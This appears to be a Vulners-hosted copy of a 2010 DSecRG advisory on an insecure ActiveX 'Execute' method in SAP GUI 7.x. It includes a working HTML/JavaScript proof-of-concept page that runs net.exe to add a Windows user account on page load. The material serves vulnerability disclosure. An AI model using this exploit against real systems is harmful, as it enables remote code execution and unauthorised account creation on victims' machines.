Vulners
Lucene search
SAP GUI version 7.00 BExGlobal Active-X unsecure method
=======================================================
SAP GUI version 7.00 BExGlobal Active-X unsecure method
=======================================================
Security vulnerability found in SAP GUI 7.10 and BI 7.0 that allows operating system functions to be called remotely.
Application: SAP GUI
Versions Affected: SAP GUI (SAP GUI 7.1)
Vendor URL: http://SAP.com
Bugs: Insecure method. Code Execution.
Exploits: YES
Reported: 16.10.2009
Vendor response: 27.10.2009
Date of Public Advisory: 23.03.2010
Author: Alexey Sintsov from DSecRG
Description
***********
Insecure method was founded in SAPBExCommonResources (class BExGlobal) activeX control component which is a part of SAP GUI.
One of the methods (Execute) can be used to execute files on users system.
Details
*******
Attacker can construct html page which call vulnerable function "Execute" from ActiveX Object BExGlobal.
Example (add user 'don_huan' with password 'p4ssW0rd'):
*******
<html>
<title>*DSecRG* Add user *DSecRG*</title>
<object classid="clsid:A009C90D-814B-11D3-BA3E-080009D22344" id='DH'></object>
<script language='Javascript'>
function init()
{
DH.Execute("net.exe","user don_huan p4ssW0rd /add","d:\\windows\\",1,"",1);
}
init();
</script>
DSecRG
</html>
# 0day.today [2018-03-05] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Mar 2010 00:00Current
7.1High risk
Vulners AI Score7.1